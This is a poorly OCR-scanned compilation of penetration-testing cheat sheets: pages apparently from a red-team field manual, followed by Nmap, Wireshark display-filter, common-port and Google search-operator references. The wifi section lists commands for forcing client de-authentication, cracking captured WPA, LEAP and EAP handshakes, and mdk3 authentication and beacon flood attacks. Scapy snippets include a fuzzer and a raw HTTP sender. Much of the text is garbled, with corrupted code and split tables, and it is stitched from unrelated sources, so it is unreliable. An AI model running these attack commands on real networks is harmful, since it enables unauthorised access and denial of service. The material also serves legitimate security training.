Send 1 packet @ layer 3
Send 2 packets @ layer 2
Send faster using tcpreply
Send 1 packet & get replies
Send only return 1st reply
Send packet- 1000 times
Sniff 100 packets on ethO

MSG

sr ( IPv6 ( src=" ipv6

n'

dst=".ipv6

n

I /ICHP (I I

tn)p PACKET W/ SPECIFIC PAYLOAD:
ip=IP(src=''·.ip.·'', dst=''·.ip. '')
u=UDP(dport=l234, sport=5678)
pay = "my UDP packet"
packet=ip/u/pay
packet. show ( )
wrpcap ("out.pcap",packet)
write to pcap
send(packet)

NTP FUZZER
packet=IP(src="·.ip 11 ,
dst=" ip ")/UDP(dport=l23)/fuzz(NTP(version=4,mode=4) I

SEND HTTP MESSAGE
from scapy.all import *
# Add iptables rule to block attack box from sending RSTs
# Create web.txt with entire GET/POST packet data
fileweb = open(''web.txt'','r')
data = fileweb.read()
ip = IP(dst="-ip ·")
SYN=ip/TCP(rport=RandNum(6000,-000),dport=BO,flags="S",seq=4)
SYNACK = srl(SYN)
ACK=ip/TCP(sport=SYNACK.dport,dport=BO,flags="A",seq=SYNACK.ack,ack=SYNACK.
seq+l)/data
reply,error = sr(ACK)
print reply.show()

80

PERL

PERL

PORT SCANNER

use strict; use IO: :Socket;
65535;$port++) {
new(
Proto= ·"tcp",PeerAddr= · 11 12-:'.0.0.l",PeerPort= $port);
if($remote) {print "$port is open\n"); )

•

'

81

REGEX EXPRESSIONS

Start of string
0 or more

+

1 or more

0 or 1
Any char but \n
{3}

Exactly 3

{3,}

3 or more

{3,5}

3 or 4 or 5

{315}

3 or 5

[345]

3 or 4 or 5

[ A34]

Not 3 or 4

[a-z]

lowercase a-z

[A-Z]

uppercase A-Z

[0-9]

digit 0-9

\d

Digit

\D

Not digit

\w

A-Z,a-z,0-9

\W

Not A-Z,a-z,0-9

\s

White Space (\t\r\n\f)

\S

Not (\t\r\n\f)

reg[ex]

"rege" or "regx"

regex?

''rege'' or ''regex''

regexk

''rege'' w/ 0 or more x

regex+

''rege'' w/ 1 or more x

[Rr]egex

''Regex'' or ''regex''

\d{3}

Exactly 3 digits

\d{ 3,)

3 or more digits

[aeiou]

Any 1 vowel

(0 [3-9] 11 [0-9]12 [0-5])

Numbers 03-25

82

'

ASCII TABLE

I

xOO
x08
x09
xOa
xOd
xlb
x20
x21
x22
x23
x24
x25
x26
x2"
x28
x29
x2a
x2b
x2c
x2d
x2e
x2f
x30
x31
x32
x33
x34
x35
x36
xr
x38
x39
x3a
x3b
x3c
x3d
x3e
x3f
x40
x41
x42
x43
x44
x45
x46
x4"
x48
x49
x4a

: NUL
: BS
: TAB
: LF
: CR
: ESC
: SPC
: !
:
:
:
:
:
:
:
:
:

x4b
x4c
x4d
x4e
x4f
x50
x51
x52
x53
x54
x55
x56
x57
x58
x59
x5a
x5b
x5c
x5d
x5e
x5f
x60
x61
x62
x63
x64
x65
x66
x6"
x68
x69
x6a
x6b
x6c
x6d
x6e
x6f
x"O
x-1
x"2
x"3

"

#

$
%
&

I
)

: +
:
'
: :

: I
: 0
: 1
: 2
: 3
: 4
: 5
: 6
:
:
:

8
9

: :
: ;
:
: =
:

: ?

K
L
M
N
0

:

p

: Q
: R
:

: @

: c

: D
: E
: F

s

: T

: u
: v

: w
: X
:

y

: z
: [
: \
: l
-;-

:
: a

: b
: c
: d
: e
: f
: g
: h
: i
: j

:
:
:
:
:

:
:
:
:
x74 :
x-s :
x"6 :

:A
: B

:

:
:
:
:
:

k
1

m
n

o
p
q
r

s
t

u

v
x-- : w
x-8 : X
x"9 : y
x'a

G

: H
: I
: J

83

FREQUENCY CHART
120-150 kHz (LF)
13.56 t1Hz (HF)
433 t1Hz (lJHF)
315 t1Hz (N. Am)
433.92 MHz (Europe,Asia)
698-894 HHz
1-lo-1-55 t1Hz
1850-1910 t1Hz
2110-2155 t1Hz
MHz
1-2 GHz
868 MHz (Europe)
915 MHz (lJS,Australia)
2.4 GHz (worldwide)
2.4-2.483.5 GHz
2.4 GHz
5.0 GHz
2.4/5.0 GHZ
4-8 GHz
12-18 GHz
18-26.5 GHz
26.5-40 GHz

RFID

Keyless Entry
Cellular (lJS)

GPS
L Band
802.15.4

(ZigBee)

802.15.1 (Bluetooth)
802 .llb/g
802.11a
802 .lln
C Band
Ku Band
K Band
Ka Band

FCC ID

LOOKUP

jhttps://apps.fcc.gov/oetcf/eas/reports/GenericSearch.cfm

FREQUENCY DATABASE
http://www.radioreference.com/apps/db/
)

;

KISMET REFERENCE
e
h
n
m

i

t
g
l
u
d

c
r
L

a
H
p

+If

CTRL+L
w
Q
X

[5]

List Kismet servers
Help
Toggle full-screen view
Name current network
Toggle muting of sound
View detailed information for network
Tag or untag selected network
Sort network list
Group tagged networks
Show wireless card power levels
Ungroup current group
Dump printable strings
Show clients in current network
Packet rate graph
Lock channel hopping to selected channel
View network statistics
Return to normal channel hopping
Dump packet type
Expand/collapse groups
Follow network center
Re-draw the screen
Track alerts
Quit Kismet
Close popup window
85

LINUX WIFI COMMANDS

rfl:ill list
rfkill unblock all
airdump-ng monO

Identify wifi problems
Turn on wifi
Monitor all interfaces

CONNECT TO UNSECURED WIFI
iwconfig athO essid $SSID
ifconfig athO up
dhclient athO

CONNECT TO WEP WIFI NETWORK
iwconfig athO essid $SSID kej
ifconfig athO up
dhclient athO

kej

CONNECT TO WPA-PSK WIFI NETWORK
iwconfig athO essid $SSID
ifconfig athO up
wpa_supplicant -B -i athO -c wpa-psk.conf
dhclient athO

CONNECT TO WPA-ENTERPRISE WIFI NETWORK
iwconfig athO essid $SSID
ifconfig athO up
wpa suppl1cant -B -i athO -c wpa-ent.conf
dhclient athO

LINUX BLUETOOTH
hciconfig hciO up
hcitool -i hciO scan --flush --all
sdptool browse BD_ADDR
hciconfig hciO name "NAME" class Ox520204
pi scan
pand -K

86

Turn on bluetooth interface
Scan for bluetooth devices
List open services
Set as discoverable
Clear pand sessions

LINUX WIFI TESTING
START MONITOR MODE INTERFACE
airmon-ng stop athO
airmon-ng start wifiO
iwconfig athO channel $CH

CAPTURE CLIENT HANDSHAKE
airdump-ng -c $CH --bssid $AP -w file athO
aireplay-ng -0 10 -a $AP -c $CH athO

#Capture traffic
#Force client de-auth

BRUTE FORCE HANDSHAKE
aircrack-ng -w wordlist capture.cap
asleep -r capture.cap -w dict.asleep
eapmd5pass -r capture.cap -w wordlist

# WPA-PSK
# LEAP
# EAP-HDS

DOS ATTACKS
mdk3
mdk3

int
int

a -a $AP
b -c $CH

#Auth Flood
#Beacon Flood

l

s-

ro
ro

m

00

0

"'

-

w

N

REFERENCES
[1] t1ubix. Linux/Unix/BSD Post-Exploitation Command List.
http://bit.ly/nucONO. Accessed on 1- Oct 2012.
[2] Tomes, Tim. Safely DGmping Hashes from Live Domain Controllers.
com/1..QlUll.Lsafel·r-dumping-hashes-_from-li v. html. Accessed
on 14 Nov 2012.
[ 3] Reverse She 11 Cheat Sheet.
_
/cheatsheet/shells/reverse-shell-cheat-sheet. Accessed on 15 Nov 2012.
[4] Damele, Bernardo. Reverse Shell One-liners.
htto://bernardodame 1 e.blogscat.com/2Jll/09/reverse-shel-s-one-liners.html.
Accessed on 15 Nov 2012.
[5] SANS Institute. IEE 802.11 Pocket Reference Guide.
httc://www.willhac}:forsushi.com/paoers/80211 Pocket Reference Guide.pdf.
Accessed on 16 Nov 2012.
[6] Tomes, Tim. Remote t1alware Deployment and a Lil' AV Bypass.
http://oauldotcom.com/2012/C51remote-malware-deplo·;ment-and.html. Accessed
on 22 Jan 2013.
[ 0 ]
Trusted Sec. Powershell Poe.
Accessed on 25 Jan
2013.
Following copyright and disclaimer apply:
Copyright 2012 TrustedSec, LLC. All rights reserved.
Redistribution and use in
modification, are permitted

source

and binary forms,
with or without
that the following conditions are met:

Redistributions in binarJ form must reproduce the above copJright notice,
this list of conditions
the following disclaimer in the documentation
and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY TRUSTEDSEC, LLC "AS IS" AND ANY EXPRESS OR
It1PLIED WARRANTIES, INCLUDING, BUT NOT LitHTED TO, THE It1PLIED WARRANTIES
OF t1ERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAit1ED. IN
NO EVENT SHALL TRUSTEDSEC, LLC OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
INDIRECT,
INCIDENTAL,
SPECIAL,
EXEt1PLARY,
OR
CONSEQUENTIAL
DAt1AGES
(INCLUDING,
BUT NOT
LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY,
WHETHER IN CONTRACT,
STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH
DAt1AGE.
The views and conclusions
in the software and documentation are
those of the authors and should not be interpreted as representing official
policies, either expressed or implied, of TRUSTEDSEC, LLC.
[8] SSL and stunnel. httc://www.J:ioptrix.com/blcq/?o=68-. Accessed on 01
Feb 2013.
[9] ''Using Nrnap to Screenshot Web Services''.
h t to:/ /blog. spider labs. com /:2 012/0 6/usinq-nrnao-to-screenshot -'debservices.html. Accessed on 26 Feb 2013.
[10] ''Schtasks Persistence with PowerShell One Liners''.
___

_

__L+.. ners_/_. Accessed on 21 Nov 2013.

94

....

INDEX
A

K

s

Airmon-ng ......................... 87

Kali .................................... 12
Kismet ............................... 85

Scapy ................................. 80
Screen ............................... 11
SNMP ................................ 38
SNMPWalk ........................ 38
Socat ........................... 37, 47
Socks ........................... 47, 58
Solaris
SQLMap
SSH .................................... 55
Callback ......................... 9
Stunnel. ............................ .47
Subnetting ........................ 36

ARPing
ASCII Table ........................ 83

8
Basic Auth ......................... 69
BeEF .................................. 68
Bluetooth ......................... 86

c
Cisco
Curl

D
DNS ................... 8, 30, 39, 43
DNSRecon ......................... 39
DSQuery ............................ 28

E
Email Sender ..................... 23
Ettercap ............................ 60

F

i FCC. ..................................85
File Transfer ..................... .43
\ Fpipe ................................ .47
',Frequencies ...................... 85
l:=TP ................................... .43
G

f,ioogle
GRUB

Linux
Chkconfig
Files .............................. 7
Mount SMB ................. 12
Scripting ........................ 8
Update-rc.d ................. 11
Wifi .............................. 86
M

T

Metasploit ........................ 56
MSFPayload ................ 56
MSFVenom .................. 56
Meterpreter ................ 24, 58
Mimikatz ........................... 61
MSSQL
MySQL

Netcat ......................... 44, 53
Nmap ........................ 39, 51
Screenshot ................. 70

0
Open Mail Relay .............. .43
Oracle
p

ICMP
lframe .............................. 68
IKE-Scan ........................... .40
IPtables ............................. 10
1Pv4 ................................... 36
1Pv6 .................................. 37

J

R

JAVA Applet ...................... 68
John the Ripper ................. 62

Railgun .............................. 58
Regex ................................ 82
Reverse Shells ................... 44

Hashing ............................. 64
fHping3
Hydra

u
User-Agents

N

Password Wordlist ............ 62
PeepingTom ...................... 70
Peri
Persistence ................ .46, 59
pfSense
Polycom ........................... .48
Ports
Postgres ............................ 73
Powershell ........................ 22
Authentication Popup .23
Run as
Proxychains ....................... 58
PSEXEC ........................ 18, 46
Putty
Python

H

Tandberg ......................... .48
TCPDump .................... 12, 39
TCPReplay ......................... 39
Tunneling ......................... .47

v
VLC. ................................... 54
Volume Shadow Copy ...... 21
VPN
VSSOwn ........................... 63

VTC

w
Wget ................................. 68
Windows ........................... 15
AT Command ............. .46
Escalation .................... 31
Firewall ....................... 18
Makecab
Port Fwd ...................... 18
RDP ............................. 19
Registry ....................... 26
Remoting ..................... 16
Scripting ...................... 30
Startup
Task Scheduler ...... 32, 46
WebDAV ...................... 46
Wine

X

95

X11 .............................. 12, 55
Xterm ............................... .45

Scripting Engine

-sC Run default scripts
--script=|
|...
Run individual or groups of scripts
--script-args=
Use the list of script arguments
--script-updatedb
Update script database
Script Categories
::

Nmap's script categories include, but are not limited to, the
following:
auth: Utilize credentials or bypass authentication on target
hosts.
broadcast: Discover hosts not included on command line by
broadcasting on local network.
brute: Attempt to guess passwords on target systems, for a
variety of protocols, including http, SNMP, IAX, MySQL, VNC,
etc.
default: Scripts run automatically when -sC or -A are used.
discovery: Try to learn more information about target hosts
through public sources of information, SNMP, directory services,
and more.
dos: May cause denial of service conditions in target hosts.
exploit: Attempt to exploit target systems.
external: Interact with third-party systems not included in
target list.
fuzzer: Send unexpected input in network protocol fields.
intrusive: May crash target, consume excessive resources, or
otherwise impact target machines in a malicious fashion.
malware: Look for signs of malware infection on the target
hosts.
safe: Designed not to impact target in a negative fashion.
version: Measure the version of software or protocol spoken
by target hosts.
vul: Measure whether target systems have a known
vulnerability.

Notable Scripts

A full list of Nmap Scripting Engine scripts is
available at http://nmap.org/nsedoc/
Some particularly useful scripts include:

dns-zone-transfer: Attempts to pull a zone file
(AXFR) from a DNS server.
$ nmap --script dns-zonetransfer.nse --script-args dns-zonetransfer.domain= -p53

http-robots.txt: Harvests robots.txt files from
discovered web servers.
$ nmap --script http-robots.txt

smb-brute: Attempts to determine valid
username and password combinations via
automated guessing.
$ nmap --script smb-brute.nse -p445

smb-psexec: Attempts to run a series of
programs on the target machine, using
credentials provided as scriptargs.
$ nmap --script smb-psexec.nse –
script-args=smbuser=,
smbpass=[,config=]
-p445 

Nmap
Cheat Sheet

v1.0

! POCKET REFERENCE GUIDE

http://www.sans.org

SANS Institute

Base Syntax
# nmap [ScanType] [Options] {targets}

Target Specification

IPv4 address: 192.168.1.1
IPv6 address: AABB:CCDD::FF%eth0
Host name: www.target.tgt
IP address range: 192.168.0-255.0-255
CIDR block: 192.168.0.0/16
Use file with lists of targets: -iL 

Target Ports

No port range specified scans 1,000 most popular
ports

-F Scan 100 most popular ports
-p- Port range
-p,,... Port List
-pU:53,U:110,T20-445 Mix TCP and UDP
-r Scan linearly (do not randomize ports)
--top-ports  Scan n most popular ports
-p-65535 Leaving off initial port in range makes
Nmap scan start at port 1
-p0Leaving off end port in range makes
Nmap scan through port 65535
Scan ports 1-65535

-p-

-Pn
Default probe (TCP 80, 445 & ICMP)

Don't probe (assume all hosts are up)

Probing Options

--min-hostgroup/max-hostgroup 
Parallel host scan group sizes

Fine-Grained Timing Options

-PE
Use ICMP Timestamp Request

Use ICMP Echo Request

--max-rate 
Send packets no faster than
 per second

--min-rate 
Send packets no slower than
 per second

--scan-delay/--max-scan-delay 
Adjust delay between probes

--host-timeout 
Give up on target after this long

--max-retries 
Caps number of port scan probe
retransmissions.

--min-rtt-timeout/max-rtttimeout/initial-rtt-timeout 
Specifies probe round trip time.

--min-parallelism/max-parallelism

Probe parallelization

-PB

-PP
Use ICMP Netmask Request

-PS
Check whether targets are up by probing TCP
ports

-PM

Scan Types

-sP Probe only (host discovery, not port scan)
-sS SYN Scan
-sT TCP Connect Scan
-sU UDP Scan

OS Detection

-sV Version Scan
-O

--scanflags
Set custom list of TCP using
URGACKPSHRSTSYNFIN in any order

Aggregate Timing Options

-T0 Paranoid: Very slow, used for IDS evasion
-T1 Sneaky: Quite slow, used for IDS evasion
-T2 Polite: Slows down to consume less
bandwidth, runs ~10 times slower than
default
-T3 Normal: Default, a dynamic timing model
based on target responsiveness
-T4 Aggressive: Assumes a fast and reliable
network and may overwhelm targets
-T5 Insane: Very aggressive; will likely
overwhelm targets or miss open ports

Output Formats

-oN Standard Nmap output
-oG Greppable format
-oX XML format
-oA 
Generate Nmap, Greppable, and XML
output files using basename for files

Misc Options

-n
Disable reverse IP address lookups
-6
Use IPv6 only
-A
Use several features, including OS
Detection, Version Detection, Script
Scanning (default), and traceroute
--reason Display reason Nmap thinks port is
open, closed, or filtered

Target specification
IP address, hostnames, networks, etc
Example: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0.0-255.1-254
-iL file input from list
-iR n choose random targets, 0 never ending
--exclude --excludefile file exclude host or list from file

Host discovery
-PS n tcp syn ping
-PA n tcp ack ping
-PU n udp ping
-PM netmask req
-PP timestamp req
-PE echo req
-sL list scan
-PO protocol ping
-PN no ping
-n no DNS
-R DNS resolution for all targets
--traceroute: trace path to host (for topology map)
-sP ping same as –PP –PM –PS443 –PA80

-p n,m,z individual
-F fast, common 100
-r don’t randomize

-sT tcp connect scan
-sU udp scan
-sZ sctp cookie echo
-sO ip protocol
-sN –sF -sX null, fin, xmas –sA tcp ack

Port scanning techniques
-sS tcp syn scan
-sY sctp init scan
-sW tcp window

Port specification and scan order
-p n-m range
-p- all ports
-p U:n-m,z T:n,m U for udp T for tcp
--top-ports n scan the highest-ratio ports

Timing and performance

Service and version detection

-sV: version detection
--version-all try every single probe
--version-trace trace version scan activity

--all-ports dont exclude ports

-D d1,d2 cloak scan with decoys
–g source spoof source port
--spoof-mac mac change the src mac

-O enable OS detection
--fuzzy guess OS detection
--max-os-tries set the maximum number of tries against a target

Firewall/IDS evasion
-f fragment packets
-S ip spoof source address
--randomize-hosts order

--reason host and port reason
--packet-trace trace packets

Verbosity and debugging options
-v Increase verbosity level
-d (1-9) set debugging level

Interactive options
v/V increase/decrease verbosity level
d/D increase/decrease debugging level
p/P turn on/off packet tracing

Miscellaneous options

--resume file resume aborted scan (from oN or oG output)
-6 enable ipv6 scanning
-A agressive same as -O -sV -sC --traceroute

-oN normal

Output

-oX xml

-oG grepable

–oA all outputs

-sC perform scan with default scripts
--script file run script (or all)
--script-args n=v provide arguments
--script-trace print incoming and outgoing communication

Scripts

-T1 sneaky
-T4 aggresive
--max-hostgroup
--max-rate
--max-parallelism
--max-rtt-timeout
--host-timeout

-T2 polite
-T5 insane

-T0 paranoid
-T3 normal
--min-hostgroup
--min-rate
--min-parallelism
--min-rtt-timeout
--max-retries

nmap -T4 -F
nmap -T4 --max_rtt_timeout 200 --initial_rtt_timeout 150 --min_hostgroup 512 --max_retries 0 -n -P0 -p80
nmap -sP -PE -PP -PS21,23,25,80,113,31339 -PA80,113,443,10042 --source-port 53 -T4
nmap -sS -sU -T4 -A -v -PE -PP -PS21,22,23,25,80,113,31339 -PA80,113,443,10042 -PO --script all
nmap -sP -PE -PS22,25,80 -PA21,23,80,3389 -PU -PO --traceroute

--initial-rtt-timeout
--scan-delay

Examples
Quick scan
Fast scan (port80)
Pingscan
Slow comprehensive
Quick traceroute:

SecurityByDefault.com

WIRESHARK DISPLAY FILTERS · PART 1
Ethernet

packetlife.net

ARP

eth.addr

eth.len

eth.src

arp.dst.hw_mac

arp.proto.size

eth.dst

eth.lg

eth.trailer

arp.dst.proto_ipv4

arp.proto.type

eth.ig

eth.multicast

eth.type

arp.hw.size

arp.src.hw_mac

arp.hw.type

arp.src.proto_ipv4

IEEE 802.1Q
vlan.cfi

vlan.id

vlan.priority

vlan.etype

vlan.len

vlan.trailer

IPv4
ip.addr

ip.fragment.overlap.conflict

ip.checksum

ip.fragment.toolongfragment

ip.checksum_bad

ip.fragments

ip.checksum_good

ip.hdr_len

ip.dsfield

ip.host

ip.dsfield.ce

ip.id

ip.dsfield.dscp

ip.len

ip.dsfield.ect

ip.proto

ip.dst

ip.reassembled_in

ip.dst_host

ip.src

ip.flags

ip.src_host

ip.flags.df

ip.tos

ip.flags.mf

ip.tos.cost

ip.flags.rb

ip.tos.delay

ip.frag_offset

ip.tos.precedence

ip.fragment

ip.tos.reliability

ip.fragment.error

ip.tos.throughput

ip.fragment.multipletails ip.ttl
ip.fragment.overlap

ip.version

IPv6

arp.opcode

TCP
tcp.ack

tcp.options.qs

tcp.checksum

tcp.options.sack

tcp.checksum_bad

tcp.options.sack_le

tcp.checksum_good

tcp.options.sack_perm

tcp.continuation_to

tcp.options.sack_re

tcp.dstport

tcp.options.time_stamp

tcp.flags

tcp.options.wscale

tcp.flags.ack

tcp.options.wscale_val

tcp.flags.cwr

tcp.pdu.last_frame

tcp.flags.ecn

tcp.pdu.size

tcp.flags.fin

tcp.pdu.time

tcp.flags.push

tcp.port

tcp.flags.reset

tcp.reassembled_in

tcp.flags.syn

tcp.segment

tcp.flags.urg

tcp.segment.error

tcp.hdr_len

tcp.segment.multipletails

tcp.len

tcp.segment.overlap

tcp.nxtseq

tcp.segment.overlap.conflict

tcp.options

tcp.segment.toolongfragment

tcp.options.cc

tcp.segments

tcp.options.ccecho

tcp.seq

tcp.options.ccnew

tcp.srcport

ipv6.addr

ipv6.hop_opt

tcp.options.echo

tcp.time_delta

ipv6.class

ipv6.host

tcp.options.echo_reply

tcp.time_relative

ipv6.dst

ipv6.mipv6_home_address

tcp.options.md5

tcp.urgent_pointer

ipv6.dst_host

ipv6.mipv6_length

tcp.options.mss

tcp.window_size

ipv6.dst_opt

ipv6.mipv6_type

tcp.options.mss_val

ipv6.flow

ipv6.nxt

ipv6.fragment

ipv6.opt.pad1

ipv6.fragment.error

ipv6.opt.padn

ipv6.fragment.more

ipv6.plen

ipv6.fragment.multipletails

ipv6.reassembled_in

ipv6.fragment.offset

ipv6.routing_hdr

ipv6.fragment.overlap

ipv6.routing_hdr.addr

eq or ==

and or &&

ipv6.fragment.overlap.conflict

ipv6.routing_hdr.left

ne or !=

or or ||

ipv6.fragment.toolongfragment

ipv6.routing_hdr.type

gt or >

xor or ^^

Logical XOR

ipv6.fragments

ipv6.src

lt or <

not or !

Logical NOT

ipv6.fragment.id

ipv6.src_host

ge or >=

[n] […]

Substring operator

ipv6.version

le or <=

ipv6.hlim

by Jeremy Stretch

UDP
udp.checksum

udp.dstport

udp.checksum_bad

udp.length

udp.checksum_good

udp.port

Operators

udp.srcport

Logic
Logical AND
Logical OR

v2.0

WIRESHARK DISPLAY FILTERS · PART 2
Frame Relay

packetlife.net

ICMPv6

fr.becn

fr.de

icmpv6.all_comp

icmpv6.option.name_type.fqdn

fr.chdlctype

fr.dlci

icmpv6.checksum

icmpv6.option.name_x501

fr.control

fr.dlcore_control

icmpv6.checksum_bad

icmpv6.option.rsa.key_hash

fr.control.f

fr.ea

icmpv6.code

icmpv6.option.type

fr.control.ftype

fr.fecn

icmpv6.comp

icmpv6.ra.cur_hop_limit

fr.control.n_r

fr.lower_dlci

icmpv6.haad.ha_addrs

icmpv6.ra.reachable_time

fr.control.n_s

fr.nlpid

icmpv6.identifier

icmpv6.ra.retrans_timer

fr.control.p

fr.second_dlci

icmpv6.option

icmpv6.ra.router_lifetime

fr.control.s_ftype

fr.snap.oui

icmpv6.option.cga

icmpv6.recursive_dns_serv

fr.control.u_modifier_cmd

fr.snap.pid

icmpv6.option.length

icmpv6.type

fr.control.u_modifier_resp

fr.snaptype

icmpv6.option.name_type

fr.cr

fr.third_dlci

fr.dc

fr.upper_dlci

PPP

RIP
rip.auth.passwd

rip.ip

rip.route_tag

rip.auth.type

rip.metric

rip.routing_domain
rip.version

ppp.address

ppp.direction

rip.command

rip.netmask

ppp.control

ppp.protocol

rip.family

rip.next_hop

MPLS

BGP

mpls.bottom

mpls.oam.defect_location

bgp.aggregator_as

bgp.mp_reach_nlri_ipv4_prefix

mpls.cw.control

mpls.oam.defect_type

bgp.aggregator_origin

bgp.mp_unreach_nlri_ipv4_prefix

mpls.cw.res

mpls.oam.frequency

bgp.as_path

bgp.multi_exit_disc

mpls.exp

mpls.oam.function_type

bgp.cluster_identifier

bgp.next_hop

mpls.label

mpls.oam.ttsi

bgp.cluster_list

bgp.nlri_prefix

mpls.oam.bip16

mpls.ttl

bgp.community_as

bgp.origin

bgp.community_value

bgp.originator_id

bgp.local_pref

bgp.type

bgp.mp_nlri_tnl_id

bgp.withdrawn_prefix

ICMP
icmp.checksum

icmp.ident

icmp.seq

icmp.checksum_bad

icmp.mtu

icmp.type

icmp.code

icmp.redir_gw

HTTP

DTP
dtp.neighbor

dtp.tlv_type

dtp.tlv_len

dtp.version

vtp.neighbor

VTP

http.accept

http.proxy_authorization

http.accept_encoding

http.proxy_connect_host

http.accept_language

http.proxy_connect_port

http.authbasic

http.referer

http.authorization

http.request

vtp.code

vtp.vlan_info.802_10_index

http.cache_control

http.request.method

vtp.conf_rev_num

vtp.vlan_info.isl_vlan_id

http.connection

http.request.uri

vtp.followers

vtp.vlan_info.len

http.content_encoding

http.request.version

vtp.md

vtp.vlan_info.mtu_size

http.content_length

http.response

vtp.md5_digest

vtp.vlan_info.status.vlan_susp

http.content_type

http.response.code

vtp.md_len

vtp.vlan_info.tlv_len

http.cookie

http.server

vtp.seq_num

vtp.vlan_info.tlv_type

http.date

http.set_cookie

vtp.start_value

vtp.vlan_info.vlan_name

http.host

http.transfer_encoding

vtp.upd_id

vtp.vlan_info.vlan_name_len

http.last_modified

http.user_agent

vtp.upd_ts

vtp.vlan_info.vlan_type

http.location

http.www_authenticate

http.notification

http.x_forwarded_for

vtp.version

http.proxy_authenticate

by Jeremy Stretch

v2.0

COMMON PORTS

packetlife.net
TCP/UDP Port Numbers

7 Echo

554 RTSP

19 Chargen
20-21 FTP

2745 Bagle.H

546-547 DHCPv6

2967 Symantec AV

6891-6901 Windows Live
6970 Quicktime

560 rmonitor

3050 Interbase DB

22 SSH/SCP

563 NNTP over SSL

3074 XBOX Live

23 Telnet

587 SMTP

3124 HTTP Proxy

25 SMTP

591 FileMaker

3127 MyDoom

42 WINS Replication

593 Microsoft DCOM

3128 HTTP Proxy

43 WHOIS

631 Internet Printing

3222 GLBP

8118 Privoxy

49 TACACS

636 LDAP over SSL

3260 iSCSI Target

8200 VMware Server

53 DNS

639 MSDP (PIM)

3306 MySQL

8500 Adobe ColdFusion

67-68 DHCP/BOOTP

7212 GhostSurf
7648-7649 CU-SeeMe
8000 Internet Radio
8080 HTTP Proxy
8086-8087 Kaspersky AV

646 LDP (MPLS)

3389 Terminal Server

8767 TeamSpeak

69 TFTP

691 MS Exchange

3689 iTunes

8866 Bagle.B

70 Gopher

860 iSCSI

3690 Subversion

9100 HP JetDirect

79 Finger

873 rsync

80 HTTP

902 VMware Server

88 Kerberos

989-990 FTP over SSL

3724 World of Warcraft

9101-9103 Bacula

3784-3785 Ventrilo

9119 MXit

4333 mSQL

9800 WebDAV

102 MS Exchange

993 IMAP4 over SSL

4444 Blaster

9898 Dabber

110 POP3

995 POP3 over SSL

4664 Google Desktop

9988 Rbot/Spybot

113 Ident

1025 Microsoft RPC

119 NNTP (Usenet)

1026-1029 Windows Messenger

4672 eMule

10000 Webmin
10000 BackupExec

123 NTP

1080 SOCKS Proxy

5000 UPnP

135 Microsoft RPC

1080 MyDoom

5001 Slingbox

1194 OpenVPN

5001 iperf

137-139 NetBIOS
143 IMAP4

1214 Kazaa

161-162 SNMP
177 XDMCP
179 BGP

5004-5005 RTP

1241 Nessus

5050 Yahoo! Messenger

1311 Dell OpenManage

5060 SIP

1337 WASTE

201 AppleTalk

1433-1434 Microsoft SQL

9999 Urchin

4899 Radmin

5190 AIM/ICQ
5222-5223 XMPP/Jabber

10113-10116 NetIQ
11371 OpenPGP
12035-12036 Second Life
12345 NetBus
13720-13721 NetBackup
14567 Battlefield
15118 Dipnet/Oddbob

264 BGMP

1512 WINS

5432 PostgreSQL

19226 AdminSecure

318 TSP

1589 Cisco VQP

5500 VNC Server

19638 Ensim

1701 L2TP

5554 Sasser

20000 Usermin

5631-5632 pcAnywhere

24800 Synergy

381-383 HP Openview
389 LDAP

1723 MS PPTP

411-412 Direct Connect
443 HTTP over SSL
445 Microsoft DS

1725 Steam
1741 CiscoWorks 2000
1755 MS Media Server

464 Kerberos

1812-1813 RADIUS

5800 VNC over HTTP
5900+ VNC Server
6000-6001 X11

25999 Xfire
27015 Half-Life
27374 Sub7

6112 Battle.net

28960 Call of Duty

6129 DameWare

31337 Back Orifice

465 SMTP over SSL

1863 MSN

497 Retrospect

1985 Cisco HSRP

500 ISAKMP

2000 Cisco SCCP

512 rexec

2002 Cisco ACS

6500 GameSpy Arcade

Chat

513 rlogin

2049 NFS

6566 SANE

Encrypted

6588 AnalogX

Gaming

514 syslog

2082-2083 cPanel

6257 WinMX

515 LPD/LPR

2100 Oracle XDB

6665-6669 IRC

520 RIP

2222 DirectAdmin

6679/6697 IRC over SSL

521 RIPng (IPv6)

2302 Halo

540 UUCP

2483-2484 Oracle DB

33434+ traceroute

6346-6347 Gnutella

6699 Napster

Legend

Malicious
Peer to Peer
Streaming

6881-6999 BitTorrent

IANA port assignments published at http://www.iana.org/assignments/port-numbers

by Jeremy Stretch

v1.1

author:

phonebook: or
rphonebook: or
bphonebook

cache:

filetype: or ext:

allinurl:

inurl:

allintitle:

intitle:

related:

info:

link:

safesearch:

date:

[#]…[#] or numrange:

site:

Advanced Operators

Search only in the subject of a
newsgroup post

Searches for the author of a
newsgroup post

Display all, residential,
business phone listings

Display the Google cache
of the page

Searches for files with that
file extension

Searches for all strings
within the URL

Searches for strings in the URL

Searches for all strings within
the page title

Searches for strings in the
title of the page

Related pages

Info about a page

linked pages

Exclude adult-content

Search only a range of months

Search within a range of numbers

Search only one website

Meaning

define:sarcastic (Get the definition of the word sarcastic)

insubject:Mac OS X (Find all newsgroup postings with "Mac OS X" in the subject of the
post. Must be used with a Google Group search)

author:Rick (Find all newsgroup postings with "Rick" in the author name or email address.
Must be used with a Google Group search)

phonebook:Rick Smith MD (Find all phone book listing for Rick Smith in Maryland.
Cannot combine with other searches)

cache:www.sans.org (Show the cached version of the page without performing the search)

filetype:ppt (Find files with the "ppt" file extension.
".ppt" are MS PowerPoint files.)

allinurl:conference SANS (Find pages with “conference” and "SANS" in the URL.
Doesn't combine well with other operators)

inurl:conference (Find pages with the string "conference" in the URL)

allintitle:conference SANS (Find pages with "conference" and "SANS" in the page title.
Doesn't combine well with other operators)

intitle:conference (Find pages with "conference" in the page title)

related:www.stanford.edu (Find websites related to the Stanford website)

info:www.sans.org (Find information about the SANS website)

link:www.sans.org (Find pages that link to the SANS website)

safesearch: sex education (Search for sex education material without returning adult sites)

